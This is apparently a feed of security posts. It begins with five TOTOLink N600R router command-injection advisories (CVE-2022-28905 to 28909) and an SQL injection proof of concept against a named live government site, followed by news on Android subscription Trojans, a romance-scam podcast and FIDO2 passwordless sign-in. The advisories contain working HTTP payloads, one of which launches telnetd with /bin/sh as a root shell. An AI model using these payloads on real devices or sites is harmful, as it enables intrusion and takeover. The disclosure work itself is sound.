TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the webwlanidx parameter in /setting/setWebWlanIdx.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the webwlanidx parameter is passed to V5, and then the matching content is passed to V7 through the sprintf function, and then V7 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setWebWlanIdx",
    	"webWlanIdn":"0test$(ls>/tmp/4.txt;)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28909: IOT_vuln/TOTOLink/N600R/3 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the langtype parameter in /setting/setLanguageCfg.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the langtype parameter is passed to V6, and then the matched content is formatted into V9 through the sprintf function, and V9 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 135
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647869489:2
    Connection: close
    
    {"topicurl":"setting/setLanguageCfg",
    "langType":"cn$(1s>/tmp/2.txt)"
    	"operationMode":	0,
    	"loginFlag":	0,
    	"lanIp":	"192.168.0.1",
    	"wanConnStatus":	"connected",
    	"multiLangBt":	"",
    	"langFlag":	0,
    	"helpBt":	1,
    	"languageType":	"cnnn",
    	"helpUrl_":	"",
    	"productName":	"N600R",
    	"fmVersion":	"V5.3c.7159",
    	"webTitle":	"",
    	"copyRight":	"",
    	"autoLangBt":	0,
    	"CSID":	"CS160R"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28906: IOT_vuln/TOTOLink/N600R/2 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the hosttime function in /setting/NTPSyncWithHost.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the hosttime function is passed to V5, and then V5 passes the matched content to V10 through the sprintf function, and then brings V10 into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/NTPSyncWithHost",
    "hostTime":"test.com$(ls>/tmp/6.txt;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28907: IOT_vuln/TOTOLink/N600R/5 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the ipdoamin parameter in /setting/setDiagnosisCfg.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the ipdoamin parameter is passed to V6, and then the matched content is passed to V8 through the sprintf function, and then V8 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setDiagnosisCfg",
    "ipDoamin":"test.com$(ls>/tmp/5.txt;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28908: IOT_vuln/TOTOLink/N600R/4 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicemac parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the devicemac parameter is passed to V6, and then the content matched by V6 is formatted into v18 through the sprintf function. Finally, v18 is executed through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"';telnetd -l /bin/sh -p 10002;'",
    	"deviceName":"zoe"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28905: IOT_vuln/TOTOLink/N600R/1 at main · EPhaha/IOT_vuln

Some mobile apps are being weaponized with Trojans that secretly sign Android users up for paid subscription services.

Several Android mobile Trojans are circulating in the wild that surreptitiously sign users up for paid services and take a cut for the scammers from the money that is billed. Many of these are getting around Google Play's official app store security measures.

Researchers from Kaspersky who have been tracking these most recent so-called "fleeceware" threats for the past several months say the malware is often capable of bypassing bot detection mechanisms on sites for paid services, and can even subscribe unsuspecting mobile device users to the scammers' own non-existent services.

The malware is often hidden within otherwise benign mobile applications such as healthcare apps, photo editors, and popular games on Google's Play mobile app store and other stores. The weaponized apps keep resurfacing almost as quickly as they are detected and removed, Kaspersky said.

Many of the applications ask for permission to access the user's notifications and messages. If those permissions are granted, the malware then intercepts and hijacks messages containing confirmation codes for their subscription, therefore leaving the users unaware they had just been subscribed to a paid service.

In a report, Kaspersky highlights four of the most widely spread Trojans in this category that it has observed in recent months — Jocker, MobOk, GriftHorse.l, and Vesub. The vendor estimates a startling 70% of Android device users had encountered subscription Trojans such as these at some point.

**Four of the Worst**  
Kaspersky identifies MobOk as the most active of the four threats. The malware was first spotted within an infected app on Google Play, but more recently it has been seen getting distributed as a payload of Triada — another mobile Trojan often hidden within preinstalled system apps on some smartphones. Kaspersky says it has observed the malware on the APK Pure Android mobile app store, hidden inside what the vendor described as a widely used modification of WhatsApp Messenger.

Once installed on a system, MobOk works by opening a subscription page to a paid service in an invisible window. If the malware has been granted access to the user's notification service, it intercepts any confirmation code that the paid service might send to the device and uses that to confirm the subscription. One feature that sets MobOk apart from the other mobile Trojans is its ability to solve CAPTCHAs on subscription sites, Kaspersky says. A plurality of the MobOk infections that the vendor observed were in Russia, followed by India and Indonesia.

Jocker, meanwhile, is malware that Kaspersky recently found hidden within messaging apps, blood pressure monitoring software, document scanning apps, and other products on Google Play. Jocker is a long-known mobile threat that continuously changes up its tactics to continue to infiltrate the official app store.

In many cases scammers download legitimate versions of these apps from Google's app store, then insert Jocker code into it and re-upload them to the store under a different name, Kaspersky says. The malware was coded to remain dormant during Google's app vetting process but to become active when the application goes live. Like MobOk, Jocker too is designed to intercept text messages or notifications containing confirmation codes and using them to sign users up for paid subscription services without their knowledge.

The current version of the malware uses a staged download process — involving four files — to install the final component of the malware on end-user systems. It adopted the technique to try to avoid malware-detection mechanisms, Kaspersky notes. Researchers from the company observed the malware being used most frequently against Android users in Saudi Arabia, Poland, and Germany.

Vesub, meanwhile, is mobile malware that Android users can encounter on unofficial app stores. The malware is hidden within spoofed versions of popular game apps that actually contain no legitimate functionality. When installed, the malware straightaway attempts to start subscribing users to paid services, while all that a user sees is a window suggesting that the app is still loading. Like most subscription Trojans, Vesub works only if it has been granted permission to access text messages or notifications. Kaspersky found the malware to be predominant in Egypt, Thailand, and Malaysia.

And finally, GriftHorse.l is different from the other malware in that it subscribes users to the malware author's own paid services, such as apps that promise to take users on a weight-loss plan for a fee. Users who sign up for these plans often do so without realizing that they are signing up for a service with periodic payments and automatic billing, Kaspersky says.

Richard Melick, director of threat reporting at Zimperium, says malware such as these should not be considered a consumer-only threat. "Organizations of all sizes must start realizing that there is no such thing as a consumer-only threat in the world of BYOD," he said, in emailed comments. "Each time Jocker and other long-standing malware go through an update, they continue to put critical data, services, and attack surfaces at risk."

Security teams need to ensure they have the same kind of security architecture for mobile endpoints as they have for traditional devices.

Both Google and Apple have implemented numerous measures over the years to prevent scammers from uploading malware to their respective mobile app stores. While the measures have helped limit malicious apps to a certain extent, security vendors have continued to find malware on these stores on a regular basis. Just last month, for instance, Google scrambled to remove at least six applications masquerading as legitimate antivirus tools that were in reality being used to drop a banking Trojan called SharkBot. Check Point estimated the malware tools were downloaded more than 15,000 times before Google removed them from Google Play.

Jocker, Other Fleeceware Surges Back Into Google Play

Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.

    # Exploit Title: explore CMS  - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti

CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm

This week on Lock and Code, we speak with Cindy Liebes about the financial and emotional damage caused by romance scams and how to spot them.
The post Recovering from romance scams with Cindy Liebes: Lock and Code S03E10 appeared first on Malwarebytes Labs.

Earlier this year, many members of the public were introduced to the facets of a long-ignored crime in cyberspace: The romance scam. A flashy documentary called The Tinder Swindler had premiered on Netflix, and in it, filmmakers documented the efforts of one man to manipulate several women into giving him tens of thousands of dollars after sometimes convincing them that he was their one true love.

Immediately after the documentary premiered, viewers judged the victims. Some viewers blamed the women in the documentary for falling for what looked, externally, like an obvious scam. Others asked how the women could be swept off their feet with so many red flags present? Others blamed the victims for not doing better research into the man, who had worked tirelessly to build fraudulent websites that claimed he was the son of a billionaire diamond miner.

But according to Cindy Liebes, Chief Cybersecurity Evangelist for Cybercrime Support Network, this public perception misses a lot, particularly in how skilled these scammers can be in their work.

> “These people are professional criminals… and I think a lot of times, for those who may say, ‘Well I would never fall for this’—they don’t realize how professional these people are.”
> 
> Cindy Liebes, Chief Cybersecurity Evangelist for Cybercrime Support Network

This week on the Lock and Code podcast with host David Ruiz, we speak with Liebes about the facts behind romance scams: How prevalent they are, the types of damage they cause beyond financial ruin, and how you can spot a romance scam as it is happening.

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “God God” by Wowa (unminus.com)

Recovering from romance scams with Cindy Liebes: Lock and Code S03E10

Three tech giants used World Password Day to announce their commitment to a passwordless future using FIDO Alliance standards.
The post Google, Apple, and Microsoft step hand in hand into a passwordless future appeared first on Malwarebytes Labs.

While we recently “celebrated” World Password Day, almost every security outlet keeps telling us that passwords alone are not enough.

In practice, in the last few years this has meant pairing passwords with something else, such as a one-time code from an app or an SMS message, in a scheme called two-factor authentication (2FA).

But while pairing passwords with a second factor is much better than using a password by itself, it is just a way of working around some very serious, inherent flaws in password authentication. Which begs the question: If passwords are such a problem, why use them at all?

Now Apple, Google and Microsoft have announced that you don’t have to.

The trio of tech giants all used World Password Day to declare increased support for FIDO Alliance standards like FIDO2, a globally-recognized standard for passwordless authentication.

According to the alliance:

> In a joint effort to make the web more secure and usable for all, Apple, Google and Microsoft today announced plans to expand support for a common passwordless sign-in standard created by the FIDO Alliance and the World Wide Web Consortium. The new capability will allow websites and apps to offer consistent, secure, and easy passwordless sign-ins to consumers across devices and platforms.

**Microsoft, Google, and Apple**

Last year, Microsoft announced that as of September 15, 2021 you can completely remove the password from your Microsoft account and use the Microsoft Authenticator app, Windows Hello, a security key, or a verification code sent to your phone or email to sign in to Microsoft apps and services.

On May 5, 2022, Google announced it will implement passwordless support in Android and Chrome, and Apple announced its support for new authentication capabilities enabled by the adoption of FIDO’s latest standard.

The expanded standards-based capabilities will give websites and apps the ability to offer an end-to-end passwordless option. Users will sign in through the same action that they take multiple times each day to unlock their devices, such as a simple verification of their fingerprint or face, or a device PIN.

With all three tech giants on board, we can expect passwordless FIDO sign-in across macOS and Safari; Android and Chrome; and Windows and Edge. This means that, for example, users will be able to sign in on a Google Chrome browser that’s running on Microsoft Windows, using a passkey on an Apple device.

**FIDO2**

Instead of using a password, which can be intercepted as it passes over the Internet, and has to be processed and stored by each service you use, FIDO2 uses public-key encryption. It performs the cryptographic operation that verifies who you are on a device you own, using a private key that never leaves your possession. This means that nothing of value is shared with or stored on the website or service you’re using, and the information sent back and forth during authentication is of no use to an attacker.

FIDO2 combines two standards: WebAuthn and CTAP. WebAuthn does the important job of setting out how web browsers authenticate to websites, but the real magic of FIDO2 is CTAP, the Client to Authenticator Protocol.

CTAP is what allows that crucial cryptographic operation to happen on a wide variety of devices (referred to as “roaming authenticators”), including hardware keys, phones, and laptops. These roaming authenticators are expected to have a mechanism to obtain a “user gesture” which authorises the cryptographic operation, such as a consent button, a password, a PIN, a fingerprint, or face recognition. And this is what allows you to approve your authentication to a website using your iPhone’s Touch ID or Windows Hello.

Devices that act as roaming authenticators can also communicate with other devices, so you can do things like signing in to websites you’re visiting on your laptop by using Touch ID on your iPhone or drawing a pattern on your Android tablet.

**Will it work?**

The idea of passwordless authentication is to create a login method that is secure and easy-to-use, and that eliminates the risks of phishing, password guessing, password reuse, and credential stuffing.

As with all security innovations, we don’t expect attackers to respond by giving up and going home, just to shift their attention to (hopefully) more difficult and expensive forms of attack.

When Microsoft announced in September that you no longer needed a password, we spoke to Per Thorsheim, one of the world’s leading experts on passwords. He had some major concerns about situations when people lose access to their choice of authenticator, and with that lose access to their Microsoft account.

> \[I am concerned about\] when people lose access to their choice of authenticator, and by that lose access to their Microsoft account. I’ve attempted account recovery with Microsoft before, and I know others who have tried and failed miserably. Account recovery is hard, usually to avoid making the process a prime target for hackers.

FIDO2 puts a heavy burden on the account recovery process. Will there be a backup method similar to a “forgot my password” procedure, or do I have to create a new account which can then be linked to my online persona? Either way, such a method could create create a backdoor for attackers to target instead of FIDO-protected authentication.

Passwordless authentication could also multiply the stress caused by a stolen or lost device. If an attacker can guess your PIN or pattern they have access to all of your accounts.

Fortunately, rate-limits on phones makes that very difficult. Even if you secure your device with a 4-digit PIN or a pattern, an attacker finding or stealing your device will have to be very lucky to guess it correctly before the device shuts them out altogether.

However, trusting someone with the access code to your phone will become the equivalent of handing them the key to your entire online life.

If the importance of device access increases, this could lead to more stringent authentication requirements on our pohnes. For example, PINs with 10 digits instead of four or six, or more complicated patterns. And perhaps we’ll say goodbye to default PINs as well.

Nevertheless, we look forward to the passwordless future, even if we may have to work out some details along the way. Passwords have outlived their use for important resources: Victims have been made despite doing everything right; and threat actors have made an industry out of phishing our passwords, keyphrases, and security questions, and from brute-force guessing our passwords.

It is time for something new and three tech giants working together with an established industry association on a passwordless future looks promising.

Stay safe, everyone!

Tag

#apple